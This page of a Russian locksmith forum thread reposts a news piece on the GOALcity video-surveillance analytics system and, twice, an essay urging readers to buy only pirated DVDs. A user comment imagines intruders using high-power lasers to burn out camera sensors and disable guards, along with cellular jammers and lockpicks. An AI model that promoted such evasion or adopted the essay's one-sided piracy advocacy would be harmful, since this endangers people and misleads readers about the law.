PDA

Просмотр полной версии : хакеры и локспикеры - одна компания



Страницы : 1 [2] 3

SAWWA
04.07.2011, 02:39
http://www.3dnews.ru/news/

Спецлаб: статистика становится изощрённее

Константин Ходаковский

Компания Спецлаб ориентирована на безопасность, но возможности ее систем видеонаблюдения выходят далеко за рамки этой сферы. «Интеллектуальные видеодетекторы» изучают все движения, которые совершают объекты перед камерами. Видеоаналитика и событийная логика позволяют наполнять базу данных широким спектром информации, а такие алгоритмы, как детектор лиц или определитель автомобильных номеров, легко формализуют эту информацию, привязывая к конкретным людям или автомобилям. При этом изучается всё: характер, размеры, геометрия, частота, скорость и направление движения, а также множество специализированных функций.

Система GOALcity использует круглосуточную видеостатистику в охранных целях, указывая на людей или автомобили, которые ведут себя неадекватно — сильно отклоняясь от среднестатистического характера. Это используется и на дорогах для выявления нарушителей и в отношении пешеходов. GOALcity сразу фиксирует нестандартный угол поворота, повышенную скорость, повышенную или пониженную активность, пересечение редко детектируемых зон и так далее.
http://www.zamkidveri.com/forum/images/imported/2011/07/image1-1.jpg
Экстремальные эмоции заставляют совершать человека нестандартные движения. Точные программные видеодетекторы легко фиксируют отклонения от нормальной статистики, оповещая редкими короткими сообщениями о выявленных опасностях.

http://www.youtube.com/watch?v=u0KVDhlkwXY&feature=player_embedded
Благодаря такому подходу, охраннику нет надобности постоянно смотреть на мониторы видеонаблюдения, теряя бдительность и не имея возможности отойти. Более того, разработчики системы GOALcity предусмотрели вход для цифрового телевидения, чтобы развлекать оператора во время работы. Таким образом, возрастает вероятность, что человек среагирует на опасное событие, если посреди футбола на его экране появится оповещение или запись с камер наблюдения.

Но GOALcity имеет и более разностороннюю систему статистики, которая отображается в реальном времени или архивных данных. В каждой панели видеоаналитики можно задать шаблон параметров, необходимых для учета. Например, количество продетектированных лиц, прошедших через вход в здание.

http://www.youtube.com/watch?v=LvCO8db74UA&feature=player_embedded
Или число машин, проехавших по дороге. Естественно, возможно строить комбинированные алгоритмы, например, число объектов, пересекающих переднюю границу объекта в направлении этого объекта, но только тех, кто перед этим шел параллельно этой границе.

http://www.youtube.com/watch?v=5IgVRPCZ30o&feature=player_embedded
Можно составить карту активности, например, места, где интенсивность движения наибольшая, могут окрашиваться в красный цвет, средняя — в желтый, слабая — в зеленый, никакая — не окрашиваться. Существует множество типов карт, причем они могут меняться по долгосрочности статистики.
Карту активности можно настраивать более тонко, например, только на лица или номера автомобилей. В торговле данная видеокарта позволяет анализировать спрос, например, какой товар с каких полок берется чаще других.
http://www.zamkidveri.com/forum/images/imported/2011/07/image2-1.jpg
Можно также производить анализ теплового излучения при использовании тепловизора.

http://www.youtube.com/watch?v=TV4ThlV4ggQ&feature=player_embedded
В отчеты попадает и статистика по контролю окружающей среды, по которой можно проанализировать изменения температуры, давления, влажности, качества воздуха и даже радиации. GOALcity позволяет синхронизировать показания датчиков с записью определенных лиц и точно установить полученную дозу радиации.
..................
а ещё самое важное, это то, что потенциальным злоумышленникам придётся в срочном порядке обзаводиться лазерными указками мощностью более 1-5 Ватт с определёнными модификациями.. и больше.. для выжигания сенсоров камер наблюдения, подавления постов охраны с биологическими составляющими , пока паскудники только отрабатывают свои навыки на пилотах, а полиция их периодически ловит, правда результат пока невнятный и это пока..
вооружившись в добавку к лазерной установке из десятка мощных диодов
http://gypermarket.at.ua/foto/lazer/sxema_lazera.JPG
http://www.zamkidveri.com/forum/images/imported/2011/07/15122553_vwweid101127021453-1.jpg


ещё и приборчиком для обнаружения разного рода камер
http://www.zamkidveri.com/forum/images/imported/2011/07/m1-1.jpg
http://www.zamkidveri.com/forum/images/imported/2011/07/722289_w640_h640_01-1.jpg
(правда нет полного доверия именно к подобного рода оборудованию по скрытым камерам)

и подавителем сигналов сотовой сети
http://www.zamkidveri.com/forum/images/imported/2011/07/most22-1.jpg
http://www.zamkidveri.com/forum/images/imported/2011/07/a_ps1_1-1.jpg
http://www.zamkidveri.com/forum/images/imported/2011/07/bughunter_ru_raz_01_11_4-1.jpg

ОДНАКО вооружившись так в добавок к умению работать отмычками у человека появляется несколько иной взгляд относительно вопросов безопасности жилища, коммерческой тайны... предприятий и т.д.... весёлые времена

SAWWA
09.07.2011, 01:19
afanas.ru

трезвый взгляд на некоторые вещи

правда и ложь о пиратских DVD-дисках
ПОЗДНЕЕ ЗАМЕЧАНИЕ (2005-2006)
Статья написана в начале 2003 года. Реальная ситуация, качество и цены на российском рынке с тех пор изменились. Для "простого народа" - в лучшую сторону (цены), не без помощи упомянутых пиратов. Для владельцев хорошей аппаратуры и ценителей качества - НЕ в лучшую - большой процент некачественных релизов не только у пиратов, но даже у лицензионных производителей. Особо стоит отметить пиратские сборники "6 в 1" ("8 в 1", "12 в 1" далее везде) - от качества ДВД там даже теоретически ничего не могло остаться, иногда оно может быть даже хуже старых видеокассет. Так что к некоторой ценовой конкретике изложенной в статье не стоит подходить строго - она уже устарела. Тем не менее основные принципы и моё отношение к копирайту в киномире никуда не делись.
Предисловие. О каких дисках мы говорим.

Нелицензионные DVD-диски в России грубо можно разделить на три группы:

Пиратские "копии" лицензионных дисков R5 "один в один". Отличаются от оригинала лишь ценой и иногда внешним видом (другой тип коробочки, нет буклетика с рекламой и пр.). Качество и содержание звука и видео ПОЛНОСТЬЮ ИДЕНТИЧНО.
Диски "пиратского производства". За основу взят DVD-диск другого региона, видео ИДЕНТИЧНО. В звук добавлена русская дорожка, обычно двух-трёх-голосая, но может быть и отличный многоголосый перевод. Звук при этом остаётся DD5.1 и сравнительно высокого качества (чуть хуже буржуйского оригинала, но иногда даже лучше лицензионного R5). Часто порезаны бонусы.
"Отстой" - экранные(тряпочные) и VHS-копии, пережатый мп4 из Сети и прочая фигня, записанная (и изданная) в DVD-формате. Сюда же можно отнести "пережатые" почти вдвое (с двух слоёв на один) DVD-диски, но они встречаются всё реже...

Вопреки культивируемому СМИ (и оплаченному!) мнению, доля "отстоя" в "пиратском" рынке в целом очень невелика и при соблюдении элементарной осторожности можно никогда с такими дисками и не встретиться (пожалуй, наиболее устаревшая ныне фраза, прим. 2006г, М.А.). Просто найдите "честного" продавца, познакомьтесь с ним, он всегда сам укажет на "отстойные" диски. В тех местах где брал диски я слово "экранка" просто явно стояло в прайс-листе (примерно два десятка фильмов из полутора тысяч!) - в результате из полутора сотен купленных мною за год "пираток" НИ ОДНОГО диска из третьей группы. Судить о "пиратских" дисках в целом на основании экранок практически эквивалентно тому, что ругать фирму "Дюраселл" за отвратительные батарейки, купленные в электричке по два рубля! Просто не покупайте "в электричке" :-)!

Иногда один и тот же фильм может быть в нескольких вариантах - из всех трёх групп. Поэтому если вы видели "отстойный" вариант - совершенно не значит что в другом месте или в другое время этот же фильм будет тоже "отстоем"(если он только не последний хит проката). Почему так получается? Очень просто. Когда "свежий" фильм только выходит в прокат, DVD-диска (даже американского) ещё не существует, а глупые поклонники уже начинают спрашивать его на лотках. Для таких "нетерпеливых" быстро выпускают небольшую партию "экранок". Затем приходит буржуйский диск. Пираты переводят его быстрее лицензионщиков и тут же пускают в продажу. И, наконец, фильм дублируют официально и выпускают в пятой зоне. Начиная с этого момента пиратам проще просто копировать вышедший лицензионный диск. Таким образом в некоторый момент на "пиратском" рынке может присутсвовать сразу три варианта одного и того же фильма. Более того - иногда встречаются несколько вариантов дисков второй группы (разные производители).

ВНИМАНИЕ! Далее третью группу ("отстой") Я ВООБЩЕ НЕ РАССМАТРИВАЮ и под словом "пиратский диск" будет пониматься диск 1-2 групп.
Маленькая ложь, или об одной рекламе...
В начале 2003 года глянцевые журналы заполонила следующая реклама:

Любите экстрим? Не покупайте пиратские диски потому штааа...
Когда я увидел её в третьем по счёту журнале я не выдержал и решил написать опровержение. В какой-то степени меня опередил Максим Лядов с IXBT - но, так как сайт официальный(а, возможно, и по иным причинам), его статья получилась черезчур "аккуратная". Мой же сайт - частный, поэтому позволю себе высказать исключительно своё мнение, без цензуры. Итак, для начала я заявляю, что ВСЁ ЧТО НАПИСАНО В ЭТОЙ РЕКЛАМЕ - ЛОЖЬ!!! Пойдём по пунктам:

"Поломка компонентов" - самая, пожалуй страшная угроза (и картинка соответствующая). Мы вместе с ближайшими знакомыми ("первого порядка", т.е. личный контакт) владеем суммарно полутысячей пиратских дисков. Ни одной поломки. Если добавить что я ни разу не слышал о случаях поломки у РЕАЛЬНЫХ людей (общих знакомых и пр., "второго порядка") - цифра увеличится до тысячи. Сэкономлено 1000*(25-5)=20000$ (25 - стоимость "лицензии", 5 - стоимость по которой мы берём диски). Это - 100 DVD-плееров! Даже если каждый тысячный диск будет ПОЛНОСТЬЮ ломать плеер можно вместо каждого сломанного покупать десяток новых и ещё останется на приличную новую иномарку (в смысле - автомобиль). Возможно "кое-где у нас порой" у кого-то что-то и ломалось. Но такие же слухи я читал и о лицензионных дисках, в частности об "Игре". Поскольку делаются все диски на одинаковых линиях, вероятность поломки, очевидно, одинаковая.
"Незащищённый производителем продукт". От кого? От покупателя высокой ценой :-)? От копирования? Так мне наоборот (как потребителю) удобнее если можно и родственникам на видеокассету сбросить, и в собственный фильм кусочек рипнуть... Короче, непонятный пункт.
"Некачественно... без контроля...". А откуда господа рекламодатели это взяли - за спиной что ли стояли? Может он есть - контроль? А по качеству бывает и наоборот - перевод пиратов ЛУЧШЕ чем на лицензии. Видео - всегда одинаковое. А неотключаемые субтитры на английской дорожке в лицензионных дисках я бы качеством не называл...
"Лишает возможности увидеть НОВЫЕ ..." - всё с точностью до наоборот, особенно если пиратский перевод выходит на несколько месяцев раньше и иногда официального релиза вообще НЕТ В ПРИРОДЕ. Т.е. пиратский диск ДАЁТ МНЕ ВОЗМОЖНОСТЬ увидеть как раз НОВЫЕ программы, а не ограниченный круг запоздавших официальных релизов... А с учётом ограниченности бюджета обычного росиянина ещё интереснее получается. Допустим у меня на видео выделено 30 долларов в месяц. Если я буду покупать только лицензию - я посмотрю в год всего 12 фильмов. А если пиратку - 72 фильма. На 60 фильмов больше!!! Т.е. использование ТОЛЬКО ПИРАТСКИХ дисков даёт мне возможность по сравнению с лицензией посмотреть 60 "НОВЫХ ИНТЕРЕСНЫХ ПРОГРАММ"!!! Что-то господа рекламодатели напутали :-)
"Лишает возможности снизить цену..." - нас что, за идиотов держат? Когда пиратов не было и диски только начинались цена стояла как вкопанная годами - 25-30 баксов. И только с появлением массового пиратского рынка стали появляться всяческие "уценки", "акции", "распродажи" и пр. НЕКОТОРЫХ залежалых лицензионных дисков. Это же элементарный закон рынка - нет конкуренции - имеем монопольные высокие цены. Появляется конкуренция - идёт снижение цены. А не наоборот. О возможных возражениях про окупаемость отчислений "буржуям" я скажу в следующей главе. К тому же не умеют И НЕ ХОТЯТ договариваться с "буржуями". Игровики компьютерные (как правильно отметил М.Лядов) - научились - многие недорогие переводы игр продаются ОФИЦИАЛЬНО.
"Создаёт экономические трудности..." - ну наконец-то хоть одно слово правды! :-) Только мне как потребителю до чужих трудностей дела нет. Продукция AMD тоже создаёт экономические трудности компании Intel - ну и что? Мне от этого только лучше - процессоры становятся быстрее и дешевле...
"Вопрос Вашего престижа". Помните анекдот про новых русских и галстук за штуку баксов ("дурак ты - я знаю место где такой же ТРИ штуки стоит")? Если престиж понимать как "распальцованность" и желание купить "такой же но по ТРИ" - то реклама права. Но я бы это назвал глупостью, а не престижем. Нам не "шашечки" - нам ЕХАТЬ!!!

В качестве аналогии представьте плакат с эмблемой кока-колы на черепе с костями и подписью НЕ ПОКУПАЙТЕ КОКА-КОЛУ, потому что она:

может убить Вас (действительно, наверняка же зафиксирован хоть один случай когда кто-то подавился)
часто приводит к простуде (действительно, от холодной коки со льдом жарким летом бывает...)
содержит консерванты и другие синтетические вредные для здоровья добавки
злоупотребление вредит желудку
Мешает нам выпускать новые виды ПЕПСИ для ВАС (синие, зелёные, :-))
не престижна и не современна, полный отстой, годится лишь для Санты - старого пи**ра! Бритни никогда не пьёт эту гадость :-)

И подпись: компания Пепсико. Как вы думаете - подали бы на неё в суд за недобросовестную рекламу? А ведь разницы с "антипиратской" рекламой - никакой!

(лично я ничего не имею против Кока-Колы и против Пепси тоже. Пример взят только для сравнения, все совпадения с реальными продуктами случайны и т.д. и т.п. Обе воды - замечательные :-))
И, наконец, сведённые в таблицу основные свойства (достоинства и недостатки) лицензионных и пиратских дисков (ВТОРОЙ группы, т.к. диски первой группы просто идентичны лицензионным и отличаются лишь впятеро меньшей ценой)
Свойство/качество Лицензия Пиратские диски (ВТОРАЯ ГРУППА)
Цена, $ (розница/мелк.опт) 25-30/15-20 5-7/4-5
Видео (основной фильм) Оригинал Оригинал
Русский звук Дубляж либо закадровый, обычно многоголосый. Обычно хуже оригинала, но не намного. Бывает и заметно хуже. Закадровый, многоголосый или двухголосый, иногда одноголосый. Качество звука примерно как у лицензии, иногда даже лучше. Качество перевода - по разному (иногда лучше лицензии, иногда хуже).
Оригинальный звук Оригинал. Русские субтитры есть. Иногда - НЕОТКЛЮЧАЕМЫЕ, т.е. "совсем оригинальный" фильм не посмотришь... Оригинал. Иногда НЕТ русских субтитров.
Бонусы (дополнения) Обычно есть, хотя часто более скудные чем в оригинале. Иногда без перевода. Часто отсутствуют. Почти всегда без перевода. Изредка присутствует меню бонусов без их фактического наличия, что приводит к глюкам при попытке их вызвать (вылет в главное меню например).
Ассортимент Некий (не знаю как оценить по абсолютной шкале). Намного шире - все оригиналы плюс новые фильмы, плюс не выходившие вообще на R5 переводы, плюс много копий без переводов - музыка и порнуха.
Меню По-разному. Иногда - как в оригинале, иногда - переделанное, как правило - корректное и часто анимированное. Обычно упрощённое или переделанное, часто - статичное. Изредка - местами глючное (при удалении бонусов или при выборе звука). Бывает что звук можно выбрать ТОЛЬКО кнопкой аудио на пульте (меню не работает), бывает и наоборот - русская версия доступна только через меню, а кнопкой аудио не выбирается. В любом случае до фильма с нужным звуком так или иначе добраться можно, а вот остальные рюшечки-фенечки не гарантированы.
Брак, возврат, гарантии Статистика небольшая. Из пары десятков лицензионных дисков у меня сильно глючил и тормозил один, но только на дорогом Филипсе. Менять отказались, т.к. на плеере в магазине всё было в норме. Переход на ББК снял проблему. По идее (при наличии чека) обмен явного брака не вызывает сомнений. Из прошедших через мои руки (для себя и друзей) трёх сотен дисков не считывались три и сильно глючил один. Все четыре были без проблем возвращены продавцу в обмен на деньги. При нормальном продавце возврат вполне реален. Но даже если просто ВЫБРАСЫВАТЬ бракованные при такой статистике (всего 1,3%!!!) это с лихвой покроется огромной разницей в цене с лицензионными дисками (отнюдь не один процент!)
Неотключаемая реклама в начале Бывает, иногда длинная (до пяти минут). Особенно странно наличие рекламы фильмов с насилием/кровью на ДЕТСКИХ дисках с мультиками :-(. Патологическая жадность - содрать 30 долларов с потребителя и ещё ЗАСТАВЛЯТЬ его смотреть рекламу за собственные деньги! Не встречал
Большая ложь, или о себестоимости...

Не давайте им ничего! Пока вы даёте - они будут просить!
(Марк Розовский на спектакле "Песни нашего двора")

Я работаю бухгалтером (в России, если кто пока не въехал!). Представьте себе такую абсурдную ситуацию: допустим я прихожу к директору и говорю, что для продуктивной работы мне нужно где-то жить и чем-то питаться, и ещё как-то на работу добираться - правильно? - вот счёт из гостиницы "Россия" на триста пятьдесят долларов в день за люкс, вот счёт из ресторана на сто баксов и вот счёт от транспортной компании за лимузин на пятьдесят. Итого в день 500. А в месяце их 30. А ведь ещё одежда (счёт из бутика), развлечения(счёт из ночного клуба) и пр... Короче хочу зарплату 20000$ в месяц!!! Далее возможны три основных варианта:

Директор в плохом настроении или у него нет чувства юмора. Уволит сразу!!!
У директора есть чувство юмора. Предложит ПОДТЕРЕТЬСЯ этими счетами, сходить опохмелиться и больше таких глупостей не говорить.
Директор - идиот. Он проверит счета, перезвонит в гостиницу. Если всё так и есть (т.е.счета подлинные и я его НЕ ОБМАНУЛ), вздохнёт и выпишет зарплату $20000.

Последний вариант кажется абсурдным, но миллионы доверчивых кинозрителей издатели держат именно за таких идиотов. Зрители вздыхают и платят. За билеты. За кассеты. За DVD-диски. По счетам, завышенным в сотни раз (а не в 10-20 как в примере со СКРОМНЫМ бухгалтером). Кино-видео-аудиоиндустрия поставила всё с ног на голову. Они говорят нам: "мы вложили в этот фильм сто миллионов долларов - мы наняли ДЛЯ ВАС лучших звёзд и заплатили им по пять миллионов каждому, на вторые роли тоже очень хорошие актёры (по миллиону), мы снимали лучшими камерами в лучших студиях (столько-то миллионов), мы оборудовали звуковые студии исключительно колонками "Наутилус" и кабелями "НордОст Валхалла"(12000$ за один кусок кабеля) и прочей отличной аппаратурой! Мы заплатили за авторинг ("вы знаете сколько в америке стоит авторинг?") столько-то, за эффекты столько-то. МЫ ВЫНУЖДЕНЫ делать дорогие диски и дорогие лицензии чтобы окупить этот грандиозный проект".

А знаете как они думают на самом деле (я сознательно упрощаю, не разделяя прокат, диски, кассеты, перевод, лицензирование и пр. Принцип остаётся, хоть структура и сильно усложняется)? "Так, при таком сценарии фильм посмотрят как минимум 10 миллионов человек. Эти идиоты до сих пор готовы платить нам по 30 баков, т.о. мы имеем 300милиионов бюджета. Ну половину мы сразу оставим себе и на налоги. А на оставшиеся 150 мы вполне в состоянии нанять ДиКаприо за десять лимонов, заплатить за спецэффекты 30 лимонов и т.д. и т.п.(далее следует фактически бизнес-план).

Что любопытно, с гонорарами "звёзд" нас умудряются обмануть ДВАЖДЫ. Первый раз - когда заставляют их оплачивать (косвенно, через билеты и диски). А второй раз - когда НЕЯВНО РЕКЛАМИРУЮТ фильм. Действительно, простой идиот думает: "если актёр получает за фильм десять лимонов - это звезда! А если в фильме несколько звёзд - это видимо очень крутой фильм! Надо сходить!". Эта составляющая, "маркетинговая", наиболее сильна в Америке, где многое мерится деньгами и астрономические суммы гонораров лучше всего "доказывают" "крутость" звезды наивным потребителям.

Для меня совершенно очевидно, что если снизить бюджет всех фильмов НА ПОРЯДОК, качество НИСКОЛЬКО не пострадает. Возьмём к примеру гонорары актёров. Сколько получили за свои известные роли Миронов, Папанов, Леонов, Янковский, Вицин, Никулин и т.п.? Сотни и тысячи долларов (советский рубль примерно равен доллару). Сколько ДиКаприо, Сталлоне, Шварценнегер и т.п.? Миллионы и десятки милионов. Разница НА ЧЕТЫРЕ ПОРЯДКА!!! Неужели они во столько раз лучше сыграли? Мне лично кажется что нет, я бы сказал даже наоборот :-). Талант не покупается за миллионы. Я и за миллиард не сыграю как Леонов или Миронов... Талантливые актёры будут хорошо играть и за десятки тысяч долларов (если рядом не предложат миллионы, разумеется).
Со стоимостью оборудования два порядка не наэкономишь, но один - запросто! Многое "профессиональное" оборудование имеет явно завышенную цену. Оно столько "стоит" только потому что богатые "киношники" его берут. Как только прекратят брать - подешевеет в десять раз. Чтобы не спорить о хитрых мало кому известных устройствах, возьмём совсем простой пример из компьютерной области (двухлетней давности, сейчас цен не знаю). 80-жильный АТА-100-шлейф стоил грубо 1 доллар. 50-жильный SCSI-шлейф - грубо 5 долларов. Технология ОДИНАКОВАЯ, провода ОДИНАКОВЫЕ, обжимает ОДИН И ТОТ ЖЕ автомат. Себестоимость очевидно тоже примерно одинаковая. Просто SCSI - это для серверов, это "круто", там "крутятся большие деньги". Куча других известных примеров, например "японский воздух"(выражение я услышал от А.Тутубалина) - фирменные бленды к дорогим объективам Canon (наверное у других брендов так же, я не интересовался) стоят 30-40 долларов. Это - просто пластмассовое колечко, штамповка на термопластавтомате. Но - раз заплатил штуку за объектив, значит ты крутой - плати и за воздух из Японии, который везут внутри этого колечка...
Кроме всего прочего можно просто брать оборудование классом ниже. Я не понимаю зачем, скажем, в студии аудио кабеля за 12000$ за штуку. Если взять кабеля за 200$ 99% слушателей ничего не заметят на CD-диске, а на DVD ничего не заметят и все 100% (после сжатия в DD5.1).

Но для меня совершенно очевидно и то, что добровольно, ради нас, никто от своих денег не откажется. Что же делать? А то же что "директор с чувством юмора" - предложить им подтереться своими лицензиями, а самим ПОКУПАТЬ ТОЛЬКО ПИРАТСКУЮ ПРОДУКЦИЮ. Пока мы не перестанем платить Голливуду, мы будем кормить ДиКаприо и прочих лощёных "звёзд". ИМХО они таких денег не заслуживают. Как только весь мир привыкнет к новым ценам, видеоиндустрия вынуждена будет строить совсем другие, реальные, бизнес-планы. И станет обычной отраслью экономики производящей рыночные товары (фильмы) на рыночных условиях. Хорошие фильмы. Не хуже нынешних, по крайней мере. Но за четыре-пять долларов. Тогда и пираты сами вымрут - никто не будет покупать пиратский диск по 3-4 если рядом лежит лицензия по 4-5!
А как же закон?
Итак, я повторяю свой призыв и одновременно основной тезис этой статьи:

ПОКУПАЙТЕ ТОЛЬКО НЕЛИЦЕНЗИОННЫЕ ДИСКИ!!!

Специально для поганых лоеров, которые уже сели писать донос: покупка пиратского диска в УСТАНОВЛЕННЫХ местах (например в стационарных павильонах, иногда даже с пробиванием кассового чека) абсолютно законна. Потребитель не обязан быть экспертом и знать о происхождении продукции. Он ИМЕЕТ ПРАВО узнать об этом (спросить сертификаты, адрес производителя и пр.), но НЕ ОБЯЗАН этого делать. Проверять торговые точки должны компетентные органы... Таким образом я призываю граждан к ЗАКОННОМУ действию, т.е. не подпадаю под статью "подстрекательство" и тому подобные, а так же под "пропаганду противоправных действий в СМИ".

А теперь по существу. ИМХО нынешние законы о копирайте (особенно американские) глубоко аморальны и чем скорее их отменят - тем лучше. Они защищают кошельки маленькой прослойки зажравшихся "правообладателей" в ущерб большинству населения, поощряют монополизм, тормозят развитие технологий. Так уже было не раз. Не так давно рабство в Америке (и крепостное право в России) было абсолютно законным, хотя никто сейчас не назовёт его моральным. Законы всегда отстают - и их пересматривают. Я очень надеюсь что разум рано или поздно победит жадность и копирайт будет полностью отменён. По крайней мере в тех извращённых формах, которые существуют сейчас и которые пытаются внедрить последовательные "борцы с потребителем". Чего стоит например запрет на вырезание рекламы при записи телепрограмм. Такие устройства запрещены в некоторых странах, и, возможно, скоро это запретят делать и просто зрителям при просмотре :-) - переключил программу - а тебя под суд! И во все винчестеры мечтают встроить блютусовый "жучок" который будет стучать "в органы" при записи "нелицензионных" файлов ... А уж DVD-RW как мечтают запретить или поставить на учёт! :-) Кстати, если кто помнит, - раньше все ксероксы(пардон, КОПИРЫ) были на учёте у Большого Брата. Сейчас - нет, но почему-то я не вижу в продаже "пиратски отксеренных" копий газеты "МК" и книг Дарьи Донцовой :-) Очевидно, дешевле оригинал купить, чем "ксерить". Вот она - НОРМАЛЬНАЯ ситуация.
Копирайт или авторское право?

По дурацкому стечению обстоятельств ближайшим аналогом буржуйских законов о копирайте является наш закон "Об авторском праве...". Из-за этого их часто путают и приравнивают, хотя изначально это СОВЕРШЕННО РАЗНЫЕ понятия (что, кстати, хорошо видно из названия). Когда я КОПИРУЮ фильм(музыку, текст), дарю копии друзьям, меняюсь ими по Сети и т.д. и т.п. - я нарушаю именно копирайт. Но я не оспариваю АВТОРСТВА произведения - оно остаётся в титрах. Пираты тоже НЕ НАРУШАЮТ АВТОРСКИХ ПРАВ - они не меняют титров, не вкладывают в уста героям порочащих текстов при переводе и т.д., и т.п. - они лишь нарушают копирайт. Т.е. лишают издателей некоторой части прибыли, но НЕ ЛИШАЮТ ИСПОЛНИТЕЛЕЙ И РЕЖИССЁРОВ ИЗВЕСТНОСТИ (или "репутации"). Я - за АВТОРСКОЕ ПРАВО и против ПЛАГИАТА (т.е. например подмены титров, присвоения себе авторства и т.п.). Но (как уже говорилось ранее) я ПРОТИВ КОПИРАЙТА.

Рискну утверждать что даже при ПОЛНОЙ отмене копирайта но при сохранении авторских прав хорошая музыка и хорошие фильмы никуда не денутся. Даже если некий музыкант(в широком смысле) не будет получать с продажи дисков НИЧЕГО (например, все wav-ы в отличном качестве выложены в Сети и все диски откопированы "пиратами" и продаются по доллару, причём и то и другое совершенно законно), он всегда сможет заработать на жизнь концертами, автографами, фотографиями "на память" и прочим ублажением "фанатов", которых у ДЕЙСТВИТЕЛЬНО талантливого музыканта при почти бесплатных дисках будет гораздо больше, чем сейчас. Просто это - другая бизнес-модель. Если сейчас концертами "раскручивают" новый компакт-диск, то никто не мешает, наоборот, бесплатными дисками "раскручивать" дорогие концерты... Зато отпадает дурацкое желание RIAA и прочих подобных антинародных организаций "обуздать" развитие технологий - встраивать всякие аппаратные защиты в CD-R-приводы, портить CD-диски всякими "антипиратскими" закладками, мучать зрителей региональными кодами, макровижном и прочими гадостями, подсматривать через файлобменные сети у кого на компьютере какие файлы лежат и подавать в суд (читайте новости - уже несколько сот человек заплатили за скриншоты со своих компьютеров по несколько штук баксов!) и прочая, прочая...

Кстати, с самого начала я (как автор материалов этого сайта) придерживаюсь именно такой политики - все мои статьи свободны для копирования, но я настаиваю на своём авторском праве (ссылка на автора + целостность материала). Самое интересное, что при этом меня всё равно "пиратят".

Так, например, несколько моих статей нашлись на диске "Обработка DV-видео" из серии "глазами профессионала" от фирмы "Навигатор". Везде все мои координаты и ссылки на свой сайт тщательно удалены, в результате статьи абсолютно безымянные (как, впрочем, и статьи от "Сплайна"). На моё письмо с вопросом о смысле этой лишней работы по обезличиванию (я же не прошу денег, т.е. экономии на копирайте - никакой) я ответа не получил. Закравшиеся подозрения в недобросовестности фирмы "Навигатор" быстро подтвердились после знакомства с содержимым диска. Подборка программ - дурацкая и противоречивая, некоторые программы будут конфликтовать друг с другом, комментарии - смешные (даже с точки зрения продвинутого чайника типа меня, что уж тут говорить о профессионалах), а ГЛАВНОЕ - основные программы, в частности Улид6.5 РАБОТАТЬ КОРРЕКТНО НЕ БУДУТ!!! Это - крякнутые демки с кучей противных ограничений. У меня весь ящик завален вопросами - почему не захватывается более 500 кадров? Да потому что такие горе-пираты кладут триал-версии и нигде об этом не предупреждают... Так что если хотите РАБОТАЮЩИХ прогамм - НЕ ПОКУПАЙТЕ диски от "Навигатора"(на них ещё значок типа знака качества "удачная покупка").
http://www.afanas.ru/video/nolicenz.htm

SAWWA
09.07.2011, 01:20
afanas.ru

трезвый взгляд на некоторые вещи

правда и ложь о пиратских DVD-дисках
ПОЗДНЕЕ ЗАМЕЧАНИЕ (2005-2006)
Статья написана в начале 2003 года. Реальная ситуация, качество и цены на российском рынке с тех пор изменились. Для "простого народа" - в лучшую сторону (цены), не без помощи упомянутых пиратов. Для владельцев хорошей аппаратуры и ценителей качества - НЕ в лучшую - большой процент некачественных релизов не только у пиратов, но даже у лицензионных производителей. Особо стоит отметить пиратские сборники "6 в 1" ("8 в 1", "12 в 1" далее везде) - от качества ДВД там даже теоретически ничего не могло остаться, иногда оно может быть даже хуже старых видеокассет. Так что к некоторой ценовой конкретике изложенной в статье не стоит подходить строго - она уже устарела. Тем не менее основные принципы и моё отношение к копирайту в киномире никуда не делись.
Предисловие. О каких дисках мы говорим.

Нелицензионные DVD-диски в России грубо можно разделить на три группы:

Пиратские "копии" лицензионных дисков R5 "один в один". Отличаются от оригинала лишь ценой и иногда внешним видом (другой тип коробочки, нет буклетика с рекламой и пр.). Качество и содержание звука и видео ПОЛНОСТЬЮ ИДЕНТИЧНО.
Диски "пиратского производства". За основу взят DVD-диск другого региона, видео ИДЕНТИЧНО. В звук добавлена русская дорожка, обычно двух-трёх-голосая, но может быть и отличный многоголосый перевод. Звук при этом остаётся DD5.1 и сравнительно высокого качества (чуть хуже буржуйского оригинала, но иногда даже лучше лицензионного R5). Часто порезаны бонусы.
"Отстой" - экранные(тряпочные) и VHS-копии, пережатый мп4 из Сети и прочая фигня, записанная (и изданная) в DVD-формате. Сюда же можно отнести "пережатые" почти вдвое (с двух слоёв на один) DVD-диски, но они встречаются всё реже...

Вопреки культивируемому СМИ (и оплаченному!) мнению, доля "отстоя" в "пиратском" рынке в целом очень невелика и при соблюдении элементарной осторожности можно никогда с такими дисками и не встретиться (пожалуй, наиболее устаревшая ныне фраза, прим. 2006г, М.А.). Просто найдите "честного" продавца, познакомьтесь с ним, он всегда сам укажет на "отстойные" диски. В тех местах где брал диски я слово "экранка" просто явно стояло в прайс-листе (примерно два десятка фильмов из полутора тысяч!) - в результате из полутора сотен купленных мною за год "пираток" НИ ОДНОГО диска из третьей группы. Судить о "пиратских" дисках в целом на основании экранок практически эквивалентно тому, что ругать фирму "Дюраселл" за отвратительные батарейки, купленные в электричке по два рубля! Просто не покупайте "в электричке" :-)!

Иногда один и тот же фильм может быть в нескольких вариантах - из всех трёх групп. Поэтому если вы видели "отстойный" вариант - совершенно не значит что в другом месте или в другое время этот же фильм будет тоже "отстоем"(если он только не последний хит проката). Почему так получается? Очень просто. Когда "свежий" фильм только выходит в прокат, DVD-диска (даже американского) ещё не существует, а глупые поклонники уже начинают спрашивать его на лотках. Для таких "нетерпеливых" быстро выпускают небольшую партию "экранок". Затем приходит буржуйский диск. Пираты переводят его быстрее лицензионщиков и тут же пускают в продажу. И, наконец, фильм дублируют официально и выпускают в пятой зоне. Начиная с этого момента пиратам проще просто копировать вышедший лицензионный диск. Таким образом в некоторый момент на "пиратском" рынке может присутсвовать сразу три варианта одного и того же фильма. Более того - иногда встречаются несколько вариантов дисков второй группы (разные производители).

ВНИМАНИЕ! Далее третью группу ("отстой") Я ВООБЩЕ НЕ РАССМАТРИВАЮ и под словом "пиратский диск" будет пониматься диск 1-2 групп.
Маленькая ложь, или об одной рекламе...
В начале 2003 года глянцевые журналы заполонила следующая реклама:

Любите экстрим? Не покупайте пиратские диски потому штааа...
Когда я увидел её в третьем по счёту журнале я не выдержал и решил написать опровержение. В какой-то степени меня опередил Максим Лядов с IXBT - но, так как сайт официальный(а, возможно, и по иным причинам), его статья получилась черезчур "аккуратная". Мой же сайт - частный, поэтому позволю себе высказать исключительно своё мнение, без цензуры. Итак, для начала я заявляю, что ВСЁ ЧТО НАПИСАНО В ЭТОЙ РЕКЛАМЕ - ЛОЖЬ!!! Пойдём по пунктам:

